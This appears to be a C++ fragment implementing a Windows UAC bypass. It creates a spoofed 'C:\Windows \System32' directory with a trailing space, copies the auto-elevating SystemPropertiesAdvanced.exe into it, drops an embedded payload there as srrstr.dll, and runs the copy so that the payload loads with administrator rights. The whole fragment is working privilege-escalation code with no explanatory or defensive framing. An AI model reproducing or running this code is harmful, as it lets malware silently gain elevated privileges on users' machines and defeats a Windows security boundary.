	CreateDirectoryW(L"\\\\?\\C:\\Windows \\", nullptr);
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", nullptr);
	CopyFileW(L"C:\\Windows\\System32\\SystemPropertiesAdvanced.exe", L"\\\\?\\C:\\Windows \\System32\\SystemPropertiesAdvanced.exe", false);
	DropResource(MAKEINTRESOURCE(IDR_DATA1), L"DATA", L"\\\\?\\C:\\Windows \\System32\\srrstr.dll");
  	_SHELLEXECUTEINFOW se = {};
	se.cbSize = sizeof(_SHELLEXECUTEINFOW);
	se.lpFile =  L"C:\\Windows \\System32\\SystemPropertiesAdvanced.exe";
	se.lpParameters = nullptr;
	se.nShow = SW_SHOW;
	se.hwnd = NULL;
	se.lpDirectory = NULL;
	ShellExecuteEx(&se);
